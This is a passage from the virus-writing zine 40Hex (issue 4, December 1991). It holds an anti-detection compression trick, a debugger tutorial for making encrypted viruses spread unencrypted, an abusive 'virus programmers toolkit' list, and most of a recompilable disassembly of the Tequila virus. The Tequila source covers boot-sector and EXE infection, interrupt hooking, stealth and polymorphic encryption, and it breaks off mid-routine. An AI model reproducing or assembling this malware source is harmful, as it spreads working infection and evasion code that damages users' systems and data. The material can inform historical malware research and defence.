e 04A0 A2 3F 36 9E 1A 2D 3A 28 D1 71 AA 7C 33 E5 1A B8
e 04B0 D3 49 3A A0 12 12 3A 7E 3B 99 24 1A FA E7 B4 2E
rcx
03C0
w
q
-------------------------------------------------------------------------------
40Hex Issue 4 December 1991
Hacked Pklite File Scanning
---------------------------
In issue two, i belive it was. I release a method of making Pklite
files un-uncompressable and un-detectable. Well seems a few people
used the trick for wrong doing. What do I mean by wrong doing you
ask? Well lets just say lame trojans and such.
Anyway, I had a few sysops on my ass about the trick and so, so now I
am must release.... The hacked Pklite scanning strings. Well I
could really give a fuck if someones BBS gets crashed, but then again
I am freinds with a lot of sysops. And besides I have a new trick
anyway :)
Well there are two strings. One for .EXE files and one for .COM
files. And here they are.
-----------------------------------------------------------------------
"01 F0 FF 50 00 00 00 03 01" Pklite EXE
"53 33 DB 53 CB 03 01" Pklite COM
------------------------------------------------------------------------
What's my new trick??? Well I won't reveal it at this point... But here
is a another compression trick. It lets you compress a file with Pklite
then again with LZExe.
First
-----
Compress the file with Pklite
Next
----
Compress the file with LZExe
It wont let you cause the file becomes bigger...
But
---
Use the DOS Undelete function to undelete the file ?zexe.tmp. Thats the
twice compressed file. Rename it to what you want. Destroy the LZ
header... And there you have it...
40Hex Issue 4 December 1991
A Further Look Into Cracking Encrypted Virues
---------------------------------------------
In Censor #1, Rabids' Data Disruptor showed a way to decrypt
encrypted viruses. The only problem with the method shown is that
once you decrypt the virus, it cannot be run without modification.
I wish to take his theory a little farther, with a different
approch.
There is a really simple way around the problem. What you will
need is a debugger. I perfer Turbo Debugger, by Borland. However
if you are good at the DOS utility Debug, you may be able to follow
along.
The routine to unencrypt is simple, really simple. What you will
need to do is make a small target file for the virus to infect. A
100 byte of less file is perfered.
Step One
--------
Copy the target file to a different filename to make two copies of
the file. Example - COPY TARGET.COM DUDE.COM
Step Two
--------
Infect one of the files, however the virus infectes the file.
Remember just infect one of the files.
Step Three
----------
Load up you dubugger (I'm gonna give Turbo Debugger steps, so people
with Debug and the Microsoft Debugger will have to improvise) and
get ready to single step through the virus.
Step Four
---------
Start single stepping through the virus. If the virus is encrypted
you will hit a loop somwhere near the beginning of the code. In
most cases this is an XOR loop. It will look something like this...
add si, [1234] ;
mov di, si ;
mov cx, 0123 ; this would be the virus size to unencrypt
* mov al, [0105] ; this is the encryption value's offset or the
; actual encryption value if no brackets are
; around it
cli ; auto increment
lodsb ; load byte from si position
xor ah, al ; xor byte at si
stosb ; store it a di (same as si)
loop 0110 ; loop until cx=0 NOTE: 0110 will be an offset
ret ; return when done
Where the "*" is, will be either the location of the encryption
value, or the actual encryption value if no brackets are around it.
If there are no brackets, keep that number in mind. Otherwise write
the offset down.
Step Five
---------
When the encryption procedure is done the virus is then unencrypted.
If you were to write the virus to disk now, it would not run. Cause
as soon as the virus runs it encrypts itself and then jumps into the
encrypted code.
Follow the program to the part where the virus is about to write the
virus to the host program. It will again call on the encryption
routine.
* Here it is again, but this time, before it XORs anything load the
encryption value with 0's. If it is a bytes value load it with 00,
if it is a word value load it with 0000 as in...
add si, [1234] ;
mov di, si ;
mov cx, 0123 ; this would be the virus size to unencrypt
* mov al, 00 ; change the encryption value to zero, thus the
; encryption will not take place at all. Instead
; the virus will produce an original strain.
cli ; auto increment
lodsb ; load byte from si position
xor ah, al ; xor byte at si
stosb ; store it a di (same as si)
loop 0110 ; loop until cx=0 NOTE: 0110 will be an offset
ret ; return when done
Now run the program at full speed. The next file the virus infects
will be unencrypted, and executable.
NOTE: This method will work only for the types of viruses that use
this type of encryption. Mainly non-resident .COM and .EXE
infectors. In other words, don't go thinking this trick will work
on Whale or anything.
40Hex Issue 4 December 1991
The Ultimate Virus Programmers Toolkit
--------------------------------------
Just thought it would be funny to list what I think is the ulitmate
virus programmers toolkit. Theroys may vary.
- Turbo Assembler (MASM sucks, and it is slow)
- Turbo Debugger (It rules, what else can I say?)
- Quick Edit (Small, Fast and Turbo-like keys)
- Sourcer 486 (The ONLY real dissembler out)
- Virus Scan by McAffe Asst. (It really is a great tool)
- VSUM (Patti Hoffman is a stupid bitch, but I must admit, this
program is the virus underground bible)
- VSAFE from Central Point Anti-Virus (Not as annoying as Flu-Shot)
- Pklite Proffesional (If you don't have it - get it)
- Norton 6.0 (Diskedit alone is worth the d/l time)
- Pc-Backup by Central Point (we all fuck up sooner or later)
- MEMWALK.EXE (great shareware program, like diskedit for memory)
- Teledisk (for boot block virus saves)
- Trunc - by Skism Programming (Electronic file shredder)
- Microsoft Press Quick Reference Series
- DOS Functions (INT 20 - 26)
- ROM and BIOS functions (INT 10, 15 - 16)
- MS DOS extentions (Expaned, extended memory interupts)
- _Undocumented DOS_ or any current text file on the subject-
- 40HEX magazine (Well I do have good stuff here, sometimes)
- Dark Angel's Phunky Virus writing guide (pretty hard to come by.
He expalins stuff well)
- The following source code
- Leprosy-B (beginers only on this one, none-the-less)
- Cancer (well documented, intermediate)
- Tiny-F (not bad intro to .COM infections)
- Dark Avenger (well availible and excellent tips on .EXE
infection)
- Stoned II (boot block intro)
- Secure 2.0 (I got the source to this. It is a virus
detection system from the guy who wrote
1260, Mark Washburn. The source has some
great examples on debug trapping, TSR
skills, and encryption)
- IBM Scan source (I have this too, it's funny... Kinda
like McAfee's SCAN but lamer. By
David Chess)
- An account on the Bulgerian Virus Exchange +359-220-4198
- An account on a BBS with Fido-Nets' virus echo (keep track of your
latest score)
- Many accounts on the Homebase BBS (408) 988-4004 2400 bps
(408) 988-5138 HST 9600
(408) 988-5190 v32 9600
(Tell Areyh I sent ya')
- Scientific Calculator (Hex aint easy)
- Vivaren (Helps you break night, or any other controlled substance)
- Food, smokes, or whatever your vice is...
That'll do it...
40Hex Issue 4 December 1991
The Tequila Virus Source
-------------------------
Nuff' said.
-------------------------------------------------------------------------------
;=============================
; the tequila virus =
; a recompilable =
; dis-assembly =
; specifically designed =
; for assembly to a COM file =
; with the A86 assembler. =
; ++++++++++++++++++ =
; If you desire a "perfect" =
; byte for byte source code =
;match-up, the MASM assembler=
; must be used and the noted =
;instructions must be changed=
; to comply with MASM syntax.=
; In addition, all byte and =
;word pointer references must=
; be changed from B and W to =
; BYTE POINTER and WORD =
; POINTER. =
;=============================
CODE_SEG SEGMENT
ASSUME CS:CODE_SEG, DS:CODE_SEG, ES:CODE_SEG, SS:CODE_SEG
ORG 0100
TEQUILA PROC NEAR
JMP START
DB 000, 000, 000, 000, 000, 000, 000, 0FFH, 0FFH
DB 009, 005, 001H, 010H, 000, 000, 002H, 0FAH, 000, 00CH
DB 00DH, 00AH, 00DH, 00AH
DB "Welcome to T.TEQUILA's latest production.", 00DH, 00AH
DB "Contact T.TEQUILA/P.o.Box 543/6312 St'hausen/"
DB "Switzerland.", 00DH, 00AH
DB "Loving thoughts to L.I.N.D.A", 00DH, 00AH, 00DH, 00AH
DB "BEER and TEQUILA forever !", 00DH, 00AH, 00DH, 00AH
DB "$"
DB "Execute: mov ax, FE03 / int 21. Key to go on!"
PROGRAM_TERMINATION_ROUTINE:
PUSH BP
MOV BP,SP
SUB SP,0CH
PUSH AX
PUSH BX
PUSH CX
PUSH DX
PUSH SI
PUSH DI
PUSH ES
PUSH DS
PUSH CS
POP DS
MOV AX,W[6]
INC AX
JE 0243H ;Masm Mod. Needed
DEC AX
JNE 020DH ;Masm Mod. Needed
DEC W[8] ;Masm Mod. Needed
JNE 0243H ;Masm Mod. Needed
JMP 0246H ;Masm Mod. Needed
MOV AH,02AH
CALL INT_21
MOV SI,CX
MOV CX,W[8]
CMP CL,DL
JNE 022FH ;Masm Mod. Needed
MOV AX,SI
SUB AX,W[6]
MUL B[011H] ;Masm Mod. Needed
ADD AL,DH
ADD CH,3
CMP AL,CH
JAE 0237H ;Masm Mod. Needed
MOV W[6],0FFFFH ;Masm Mod. Needed
JMP 0243H ;Masm Mod. Needed
MOV W[6],0 ;Masm Mod. Needed
MOV W[8],3 ;Masm Mod. Needed
JMP 02DF ;Masm Mod. Needed
MOV BX,0B800H
INT 011
AND AX,030H
CMP AX,030H
JNE 0256H ;Masm Mod. Needed
MOV BX,0B000H
MOV ES,BX
XOR BX,BX
MOV DI,0FD8FH
MOV SI,0FC18H
MOV W[BP-2],SI
MOV W[BP-4],DI
MOV CX,01E
MOV AX,W[BP-2]
IMUL AX
MOV W[BP-8],AX
MOV W[BP-6],DX
MOV AX,W[BP-4]
IMUL AX
MOV W[BP-0C],AX
MOV W[BP-0A],DX
ADD AX,W[BP-8]
ADC DX,W[BP-6]
CMP DX,0F
JAE 02B0 ;Masm Mod. Needed
MOV AX,W[BP-2]
IMUL W[BP-4]
IDIV W[0F] ;Masm Mod. Needed
ADD AX,DI
MOV W[BP-4],AX
MOV AX,W[BP-8]
MOV DX,W[BP-6]
SUB AX,W[BP-0C]
SBB DX,W[BP-0A]
IDIV W[0D] ;Masm Mod. Needed
ADD AX,SI
MOV W[BP-2],AX
LOOP 0269 ;Masm Mod. Needed
INC CX
SHR CL,1
MOV CH,CL
MOV CL,0DB
ES MOV W[BX],CX ;Masm Mod. Needed
INC BX
INC BX
ADD SI,012
CMP SI,01B8
JL 0260 ;Masm Mod. Needed
ADD DI,034
CMP DI,02A3
JL 025D ;Masm Mod. Needed
XOR DI,DI
MOV SI,0BB
MOV CX,02D
CLD
MOVSB
INC DI
LOOP 02D7 ;Masm Mod. Needed
XOR AX,AX
INT 016
POP DS
POP ES
POP DI
POP SI
POP DX
POP CX
POP BX
POP AX
MOV SP,BP
POP BP
RET
PRINT_MESSAGE:
PUSH DX
PUSH DS
PUSH CS
POP DS
MOV AH,9
MOV DX,012
CALL INT_21
POP DS
POP DX
RET
NEW_PARTITION_TABLE:
CLI
XOR BX,BX
MOV DS,BX
MOV SS,BX
MOV SP,07C00
STI
XOR DI,DI
SUB W[0413],3 ;Masm Mod. Needed
INT 012
MOV CL,6
SHL AX,CL
MOV ES,AX
PUSH ES
MOV AX,022A
PUSH AX
MOV AX,0205
MOV CX,W[07C30]
INC CX
MOV DX,W[07C32]
INT 013
RETF
DB 002, 0FE
DB 04C, 0E9
DB 080, 004
PUSH CS
POP DS
XOR AX,AX
MOV ES,AX
MOV BX,07C00
PUSH ES
PUSH BX
MOV AX,0201
MOV CX,W[0226]
MOV DX,W[0228]
INT 013
PUSH CS
POP ES
CLD
MOV SI,0409
MOV DI,09BE
MOV CX,046
REP MOVSB
MOV SI,091B
MOV DI,0A04
MOV CX,045
REP MOVSB
CLI
XOR AX,AX
MOV ES,AX
ES LES BX,[070] ;Masm Mod. Needed
MOV W[09B0],BX ;Masm Mod. Needed
MOV W[09B2],ES ;Masm Mod. Needed
MOV ES,AX
ES LES BX,[084] ;Masm Mod. Needed
MOV W[09B4],BX ;Masm Mod. Needed
MOV W[09B6],ES ;Masm Mod. Needed
MOV ES,AX
ES MOV W[070],044F ;Masm Mod. Needed
ES MOV W[072],DS ;Masm Mod. Needed
STI
RETF
INSTALL:
CALL NEXT_LINE
NEXT_LINE:
POP SI
SUB SI,028F
PUSH SI
PUSH AX
PUSH ES
PUSH CS
POP DS
MOV AX,ES
ADD W[SI+2],AX
ADD W[SI+4],AX
DEC AX
MOV ES,AX
MOV AX,0FE02
INT 021
CMP AX,01FD
JE NO_PARTITION_INFECTION
ES CMP B[0],05A ;Masm Mod. Needed
JNE NO_PARTITION_INFECTION
ES CMP W[3],0BB ;Masm Mod. Needed
JBE NO_PARTITION_INFECTION
ES MOV AX,W[012] ;Masm Mod. Needed
SUB AX,0BB
MOV ES,AX
XOR DI,DI
MOV CX,09A4
CLD
REP MOVSB
PUSH ES
POP DS
CALL INFECT_PARTITION_TABLE
NO_PARTITION_INFECTION:
POP ES
POP AX
PUSH ES
POP DS
POP SI
CS MOV SS,W[SI+4] ;Masm Mod. Needed
CHAIN_TO_THE_HOST_FILE:
CS JMP D[SI] ;Masm Mod. Needed
INFECT_PARTITION_TABLE:
MOV AH,02A
INT 021
MOV W[6],CX ;Masm Mod. Needed
MOV W[8],DX ;Masm Mod. Needed
MOV AH,052
INT 021
ES MOV AX,W[BX-2] ;Masm Mod. Needed
MOV W[03E8],AX ;Masm Mod. Needed
MOV AX,03513
INT 021
MOV W[09A0],BX ;Masm Mod. Needed
MOV W[09A2],ES ;Masm Mod. Needed
MOV AX,03501
INT 021
MOV SI,BX
MOV DI,ES
MOV AX,02501
MOV DX,03DA
INT 021
MOV B[0A],0 ;Masm Mod. Needed
PUSHF
POP AX
OR AX,0100
PUSH AX
POPF
MOV AX,0201
MOV BX,09A4
MOV CX,1
MOV DX,080
PUSH DS
POP ES
PUSHF
CALL D[09A0] ;Masm Mod. Needed
PUSHF
POP AX
AND AX,0FEFF
PUSH AX
POPF
PUSHF
MOV AX,02501
MOV DX,SI
MOV DS,DI
INT 021
POPF
JAE 0450 ;Masm Mod. Needed
JMP RET ;Masm Mod. Needed
PUSH ES
POP DS
CMP W[BX+02E],0FE02
JNE 045C ;Masm Mod. Needed
JMP RET ;Masm Mod. Needed
ADD BX,01BE
MOV CX,4
MOV AL,B[BX+4]
CMP AL,4
JE 0479 ;Masm Mod. Needed
CMP AL,6
JE 0479 ;Masm Mod. Needed
CMP AL,1
JE 0479 ;Masm Mod. Needed
ADD BX,010
LOOP 0463 ;Masm Mod. Needed
JMP SHORT RET ;Masm Mod. Needed
MOV DL,080
MOV DH,B[BX+5]
MOV W[0228],DX ;Masm Mod. Needed
MOV AX,W[BX+6]
MOV CX,AX
MOV SI,6
AND AX,03F
CMP AX,SI
JBE RET ;Masm Mod. Needed
SUB CX,SI
MOV DI,BX
INC CX
MOV W[0226],CX ;Masm Mod. Needed
MOV AX,0301
MOV BX,09A4
PUSHF
CALL D[09A0] ;Masm Mod. Needed
JB RET ;Masm Mod. Needed
DEC CX
MOV W[DI+6],CX
INC CX
SUB W[DI+0C],SI
SBB W[DI+0E],0
MOV AX,0305
MOV BX,0
INC CX
PUSHF
CALL D[09A0] ;Masm Mod. Needed
JB RET ;Masm Mod. Needed
MOV SI,01F6
MOV DI,09A4
MOV CX,034
CLD
REP MOVSB
MOV AX,0301
MOV BX,09A4
MOV CX,1
XOR DH,DH
PUSHF
CALL D[09A0] ;Masm Mod. Needed
RET
NEW_INTERRUPT_ONE:
PUSH BP
MOV BP,SP
CS CMP B[0A],1 ;Masm Mod. Needed
JE 0506 ;Masm Mod. Needed
CMP W[BP+4],09B4
JA 050B ;Masm Mod. Needed
PUSH AX
PUSH ES
LES AX,[BP+2]
CS MOV W[09A0],AX ;Masm Mod. Needed
CS MOV W[09A2],ES ;Masm Mod. Needed
CS MOV B[0A],1
POP ES
POP AX
AND W[BP+6],0FEFF
POP BP
IRET
NEW_INTERRUPT_13:
CMP CX,1
JNE 054E ;Masm Mod. Needed
CMP DX,080
JNE 054E ;Masm Mod. Needed
CMP AH,3
JA 054E ;Masm Mod. Needed
CMP AH,2
JB 054E ;Masm Mod. Needed
PUSH CX
PUSH DX
DEC AL
JE 0537 ;Masm Mod. Needed
PUSH AX
PUSH BX
ADD BX,0200
INC CX
PUSHF
CS CALL D[09A0] ;Masm Mod. Needed
POP BX
POP AX
MOV AL,1
CS MOV CX,W[0226] ;Masm Mod. Needed
CS MOV DX,W[0228] ;Masm Mod. Needed
PUSHF
CS CALL D[09A0] ;Masm Mod. Needed
POP DX
POP CX
RETF 2
CS JMP D[09A0] ;Masm Mod. Needed
NEW_TIMER_TICK_INTERRUPT:
PUSH AX
PUSH BX
PUSH ES
PUSH DS
XOR AX,AX
MOV ES,AX
PUSH CS
POP DS
ES LES BX,[084] ;Masm Mod. Needed
MOV AX,ES
CMP AX,0800
JA 05B0 ;Masm Mod. Needed
CMP AX,W[09B6]
JNE 0575 ;Masm Mod. Needed
CMP BX,W[09B4]
JE 05B0 ;Masm Mod. Needed
MOV W[09B4],BX ;Masm Mod. Needed
MOV W[09B6],ES ;Masm Mod. Needed
XOR AX,AX
MOV DS,AX
CS LES BX,[09B0] ;Masm Mod. Needed
MOV W[070],BX ;Masm Mod. Needed
MOV W[072],ES ;Masm Mod. Needed
LES BX,[04C] ;Masm Mod. Needed
CS MOV W[09A0],BX ;Masm Mod. Needed
CS MOV W[09A2],ES ;Masm Mod. Needed
MOV W[04C],09BE ;Masm Mod. Needed
MOV W[04E],CS ;Masm Mod. Needed
MOV W[084],04B1 ;Masm Mod. Needed
MOV W[086],CS ;Masm Mod. Needed
POP DS
POP ES
POP BX
POP AX
IRET
INT_21_INTERCEPT:
CMP AH,011
JB CHECK_FOR_HANDLE
CMP AH,012
JA CHECK_FOR_HANDLE
CALL ADJUST_FCB_MATCHES
RETF 2
CHECK_FOR_HANDLE:
CMP AH,04E
JB CHECK_FOR_PREVIOUS_INSTALLATION
CMP AH,04F
JA CHECK_FOR_PREVIOUS_INSTALLATION
CALL ADJUST_HANDLE_MATCHES
RETF 2
CHECK_FOR_PREVIOUS_INSTALLATION:
CMP AX,0FE02
JNE CHECK_FOR_MESSAGE_PRINT
NOT AX
IRET
CHECK_FOR_MESSAGE_PRINT:
CMP AX,0FE03
JNE CHECK_FOR_EXECUTE
CS CMP W[6],0 ;Masm Mod. Needed
JNE CHAIN_TO_TRUE_INT_21
CALL PRINT_MESSAGE
IRET
CHECK_FOR_EXECUTE:
CMP AX,04B00
JE SET_STACK
CMP AH,04C
JNE CHAIN_TO_TRUE_INT_21
SET_STACK:
CS MOV W[09A6],SP ;Masm Mod. Needed
CS MOV W[09A8],SS ;Masm Mod. Needed
CLI
PUSH CS
POP SS
MOV SP,0AE5
STI
CMP AH,04C
JNE TO_AN_INFECTION
CALL PROGRAM_TERMINATION_ROUTINE
JMP SHORT NO_INFECTION
TO_AN_INFECTION:
CALL INFECT_THE_FILE
NO_INFECTION:
CLI
CS MOV SS,W[09A8] ;Masm Mod. Needed
CS MOV SP,W[09A6] ;Masm Mod. Needed
STI
JMP SHORT CHAIN_TO_TRUE_INT_21
CHAIN_TO_TRUE_INT_21:
CS INC W[09BC] ;Masm Mod. Needed
CS JMP D[09B4] ;Masm Mod. Needed
NEW_CRITICAL_ERROR_HANDLER:
MOV AL,3
IRET
ADJUST_FCB_MATCHES:
PUSH BX
PUSH ES
PUSH AX
MOV AH,02F
CALL INT_21
POP AX
PUSHF
CS CALL D[09B4] ;Masm Mod. Needed
PUSHF
PUSH AX
CMP AL,0FF
JE 0664 ;Masm Mod. Needed
ES CMP B[BX],0FF ;Masm Mod. Needed
JNE 064F ;Masm Mod. Needed
ADD BX,7
ES MOV AL,B[BX+017] ;Masm Mod. Needed
AND AL,01F
CMP AL,01F
JNE 0664 ;Masm Mod. Needed
ES SUB W[BX+01D],09A4 ;Masm Mod. Needed
ES SBB W[BX+01F],0 ;Masm Mod. Needed
POP AX
POPF
POP ES
POP BX
RET
ADJUST_HANDLE_MATCHES:
PUSH BX
PUSH ES
PUSH AX
MOV AH,02F
CALL INT_21
POP AX
PUSHF
CS CALL D[09B4] ;Masm Mod. Needed
PUSHF
PUSH AX
JB 0691 ;Masm Mod. Needed
ES MOV AL,B[BX+016] ;Masm Mod. Needed
AND AL,01F
CMP AL,01F
JNE 0691 ;Masm Mod. Needed
ES SUB W[BX+01A],09A4 ;Masm Mod. Needed
ES SBB W[BX+01C],0 ;Masm Mod. Needed
POP AX
POPF
POP ES
POP BX
RET
WRITE_TO_THE_FILE:
MOV AH,040
JMP 069C ;Masm Mod. Needed
READ_FROM_THE_FILE:
MOV AH,03F
CALL 06B4 ;Masm Mod. Needed
JB RET ;Masm Mod. Needed
SUB AX,CX
RET
MOVE_TO_END_OF_FILE:
XOR CX,CX
XOR DX,DX
MOV AX,04202
JMP 06B4 ;Masm Mod. Needed
MOVE_TO_BEGINNING_OF_FILE:
XOR CX,CX
XOR DX,DX
MOV AX,04200
CS MOV BX,W[09A4] ;Masm Mod. Needed
INT_21:
CLI
PUSHF
CS CALL D[09B4] ;Masm Mod. Needed
RET
INFECT_THE_FILE:
PUSH AX
PUSH BX
PUSH CX
PUSH DX
PUSH SI
PUSH DI
PUSH ES
PUSH DS
CALL CHECK_LETTERS_IN_FILENAME
JAE GOOD_NAME
JMP BAD_NAME
GOOD_NAME:
PUSH DX
PUSH DS
PUSH CS
POP DS
SAVE_AND_REPLACE_CRITICAL_ERROR_HANDLER:
MOV AX,03524
CALL INT_21
MOV W[09B8],BX ;Masm Mod. Needed
MOV W[09BA],ES ;Masm Mod. Needed
MOV AX,02524
MOV DX,052A
CALL INT_21
POP DS
POP DX
SAVE_AND_REPLACE_FILE_ATTRIBUTE:
MOV AX,04300
CALL INT_21
CS MOV W[09AA],CX ;Masm Mod. Needed
JAE 06FE ;Masm Mod. Needed
JMP RESTORE_CRIT_HANDLER
MOV AX,04301
XOR CX,CX
CALL INT_21
JB 077C ;Masm Mod. Needed
OPEN_FILE_FOR_READ_WRITE:
MOV AX,03D02
CALL INT_21
JB 0771 ;Masm Mod. Needed
PUSH DX
PUSH DS
PUSH CS
POP DS
MOV W[09A4],AX ;Masm Mod. Needed
GET_FILEDATE:
MOV AX,05700
CALL 06B4 ;Masm Mod. Needed
JB 075C ;Masm Mod. Needed
MOV W[09AC],DX ;Masm Mod. Needed
MOV W[09AE],CX ;Masm Mod. Needed
READ_AND_CHECK_EXE_HEADER:
CALL 06AD ;Masm Mod. Needed
MOV DX,0A49
MOV CX,01C
CALL 069A ;Masm Mod. Needed
JB 075C ;Masm Mod. Needed
PUSH DS
POP ES
MOV DI,0E8
MOV CX,020
CMP W[0A49],05A4D ;Masm Mod. Needed
JNE 075C ;Masm Mod. Needed
MOV AX,W[0A5B]
CLD
REPNE SCASW
JNE 0754 ;Masm Mod. Needed
OR W[09AE],01F ;Masm Mod. Needed
JMP 075C ;Masm Mod. Needed
CALL READ_PAST_END_OF_FILE
JB 075C ;Masm Mod. Needed
CALL ENCRYPT_AND_WRITE_TO_FILE
RESTORE_ALTERED_DATE:
MOV AX,05701
MOV DX,W[09AC]
MOV CX,W[09AE]
CALL 06B4 ;Masm Mod. Needed
CLOSE_THE_FILE:
MOV AH,03E
CALL 06B4 ;Masm Mod. Needed
RESTORE_FILE_ATTRIBUTE:
POP DS
POP DX
MOV AX,04301
CS MOV CX,W[09AA] ;Masm Mod. Needed
CALL INT_21
RESTORE_CRIT_HANDLER:
MOV AX,02524
CS LDS DX,[09B8] ;Masm Mod. Needed
CALL INT_21
BAD_NAME:
POP DS
POP ES
POP DI
POP SI
POP DX
POP CX
POP BX
POP AX
RET
CHECK_LETTERS_IN_FILENAME:
PUSH DS
POP ES
MOV DI,DX
MOV CX,-1
XOR AL,AL
CLD
REPNE SCASB
NOT CX
MOV DI,DX
MOV AX,04353
MOV SI,CX
SCASW
JE 07B7 ;Masm Mod. Needed
DEC DI
LOOP 07A5 ;Masm Mod. Needed
MOV CX,SI
MOV DI,DX
MOV AL,056
REPNE SCASB
JE 07B7 ;Masm Mod. Needed
CLC
RET
STC
RET
READ_PAST_END_OF_FILE:
MOV CX,-1
MOV DX,-0A
CALL 06A8 ;Masm Mod. Needed
MOV DX,0A65
MOV CX,8
CALL 069A ;Masm Mod. Needed
JB RET ;Masm Mod. Needed
CMP W[0A65],0FDF0 ;Masm Mod. Needed
JNE 07F0 ;Masm Mod. Needed
CMP W[0A67],0AAC5 ;Masm Mod. Needed
JNE 07F0 ;Masm Mod. Needed
MOV CX,-1
MOV DX,-9
CALL 06A8 ;Masm Mod. Needed
MOV DX,0A6B
MOV CX,4
CALL 0696 ;Masm Mod. Needed
RET
CLC
RET
ENCRYPT_AND_WRITE_TO_FILE:
CALL MOVE_TO_END_OF_FILE
MOV SI,AX
MOV DI,DX
MOV BX,0A49
MOV AX,W[BX+4]
MUL W[0D] ;Masm Mod. Needed
SUB AX,SI
SBB DX,DI
JAE 080C ;Masm Mod. Needed
JMP OUT_OF_ENCRYPT
MOV AX,W[BX+8]
MUL W[0B] ;Masm Mod. Needed
SUB SI,AX
SBB DI,DX
MOV AX,W[BX+0E]
MOV W[4],AX ;Masm Mod. Needed
ADD W[4],010 ;Masm Mod. Needed
MUL W[0B] ;Masm Mod. Needed
ADD AX,W[BX+010]
SUB AX,SI
SBB DX,DI
JB 083C ;Masm Mod. Needed
SUB AX,080
SBB DX,0
JB RET ;Masm Mod. Needed
ADD W[BX+0E],09B
MOV AX,W[BX+016]
ADD AX,010
MOV W[2],AX ;Masm Mod. Needed
MOV AX,W[BX+014]
MOV W[0],AX ;Masm Mod. Needed
CALL 06A4 ;Masm Mod. Needed
ADD AX,09A4
ADC DX,0
DIV W[0D] ;Masm Mod. Needed
INC AX
MOV W[0A4D],AX ;Masm Mod. Needed
MOV W[0A4B],DX ;Masm Mod. Needed
MOV DX,DI
MOV AX,SI
DIV W[0B] ;Masm Mod. Needed
MOV W[0A5F],AX ;Masm Mod. Needed
MOV BX,DX
ADD DX,0960
MOV W[0A5D],DX ;Masm Mod. Needed
CALL COPY_TO_HIGH_MEMORY_ENCRYPT_WRITE
JB RET ;Masm Mod. Needed
OR W[09AE],01F ;Masm Mod. Needed
MOV BX,W[09BC]
AND BX,01F
SHL BX,1
MOV AX,W[BX+0E8]
MOV W[0A5B],AX ;Masm Mod. Needed
CALL MOVE_TO_BEGINNING_OF_FILE
MOV CX,01C
MOV DX,0A49
WRITE_THE_NEW_HEADER:
CALL 0696 ;Masm Mod. Needed
OUT_OF_ENCRYPT:
RET
COPY_TO_HIGH_MEMORY_ENCRYPT_WRITE:
PUSH BP
XOR AH,AH
INT 01A
MOV AX,DX
MOV BP,DX
PUSH DS
POP ES
MOV DI,0960
MOV SI,DI
MOV CX,020
CLD
REP STOSW
XOR DX,DX
MOV ES,DX
CALL ENCRYPT_STEP_ONE
CALL ENCRYPT_STEP_TWO
CALL ENCRYPT_STEP_THREE
MOV B[SI],0E9
MOV DI,028C
SUB DI,SI
SUB DI,3
INC SI
MOV W[SI],DI
MOV AX,0A04
CALL AX
POP BP
RET
ENCRYPT_STEP_ONE:
DEC BP
ES TEST B[BP],2 ;Masm Mod. Needed
JNE 08EB ;Masm Mod. Needed
MOV B[SI],0E
INC SI
CALL GARBLER
MOV B[SI],01F
INC SI
CALL GARBLER
RET
MOV W[SI],0CB8C
INC SI
INC SI
CALL GARBLER
MOV W[SI],0DB8E
INC SI
INC SI
CALL GARBLER
RET
ENCRYPT_STEP_TWO:
AND CH,0FE
DEC BP
ES TEST B[BP],2 ;Masm Mod. Needed
JE 0920 ;Masm Mod. Needed
OR CH,1
MOV B[SI],0BE
INC SI
MOV W[SI],BX
INC SI
INC SI
CALL GARBLER
ADD BX,0960
TEST CH,1
JE 0934 ;Masm Mod. Needed
MOV B[SI],0BB
INC SI
MOV W[SI],BX
INC SI
INC SI
CALL GARBLER
ADD BX,0960
TEST CH,1
JE 090C ;Masm Mod. Needed
SUB BX,0960
CALL GARBLER
MOV B[SI],0B9
INC SI
MOV AX,0960
MOV W[SI],AX
INC SI
INC SI
CALL GARBLER
CALL GARBLER
RET
ENCRYPT_STEP_THREE:
MOV AH,014
MOV DH,017
TEST CH,1
JE 0958 ;Masm Mod. Needed
XCHG DH,AH
MOV DI,SI
MOV AL,08A
MOV W[SI],AX
INC SI
INC SI
CALL GARBLER
XOR DL,DL
MOV B[0A39],028 ;Masm Mod. Needed
DEC BP
ES TEST B[BP],2 ;Masm Mod. Needed
JE 0978 ;Masm Mod. Needed
MOV DL,030
MOV B[0A39],DL ;Masm Mod. Needed
MOV W[SI],DX
INC SI
INC SI
MOV W[SI],04346
INC SI
INC SI
CALL GARBLER
MOV AX,0FE81
MOV CL,0BE
TEST CH,1
JE 0993 ;Masm Mod. Needed
MOV AH,0FB
MOV CL,0BB
MOV W[SI],AX
INC SI
INC SI
PUSH BX
ADD BX,040
MOV W[SI],BX
INC SI
INC SI
POP BX
MOV B[SI],072
INC SI
MOV DX,SI
INC SI
CALL GARBLER
MOV B[SI],CL
INC SI
MOV W[SI],BX
INC SI
INC SI
MOV AX,SI
SUB AX,DX
DEC AX
MOV BX,DX
MOV B[BX],AL
CALL GARBLER
CALL GARBLER
MOV B[SI],0E2
INC SI
SUB DI,SI
DEC DI
MOV AX,DI
MOV B[SI],AL
INC SI
CALL GARBLER
RET
GARBLER:
DEC BP
ES TEST B[BP],0F ;Masm Mod. Needed
JE RET ;Masm Mod. Needed
DEC BP
ES MOV AL,B[BP] ;Masm Mod. Needed
TEST AL,2
JE 0A0E ;Masm Mod. Needed
TEST AL,4
JE 09F7 ;Masm Mod. Needed
TEST AL,8
JE 09F1 ;Masm Mod. Needed
MOV W[SI],0C789
INC SI
INC SI
JMP RET ;Masm Mod. Needed
MOV B[SI],090
INC SI
JMP RET ;Masm Mod. Needed
MOV AL,085
DEC BP
ES MOV AH,B[BP] ;Masm Mod. Needed
TEST AH,2
JE 0A05 ;Masm Mod. Needed
DEC AL
OR AH,0C0
MOV W[SI],AX
INC SI
INC SI
JMP RET ;Masm Mod. Needed
DEC BP
ES TEST B[BP],2 ;Masm Mod. Needed
JE 0A1A ;Masm Mod. Needed
MOV AL,039
JMP 09F9 ;Masm Mod. Needed
MOV B[SI],0FC
INC SI
RET
MAKE_THE_DISK_WRITE:
CALL PERFORM_ENCRYPTION_DECRYPTION
MOV AH,040
MOV BX,W[09A4]
MOV DX,0
MOV CX,09A4
PUSHF
CALL D[09B4] ;Masm Mod. Needed
JB 0A37 ;Masm Mod. Needed
SUB AX,CX
PUSHF
CMP B[0A39],028 ;Masm Mod. Needed
JNE 0A44 ;Masm Mod. Needed
MOV B[0A39],0 ;Masm Mod. Needed
CALL PERFORM_ENCRYPTION_DECRYPTION
POPF
RET
PERFORM_ENCRYPTION_DECRYPTION:
MOV BX,0
MOV SI,0960
MOV CX,0960
MOV DL,B[SI]
XOR B[BX],DL
INC SI
INC BX
CMP SI,09A0
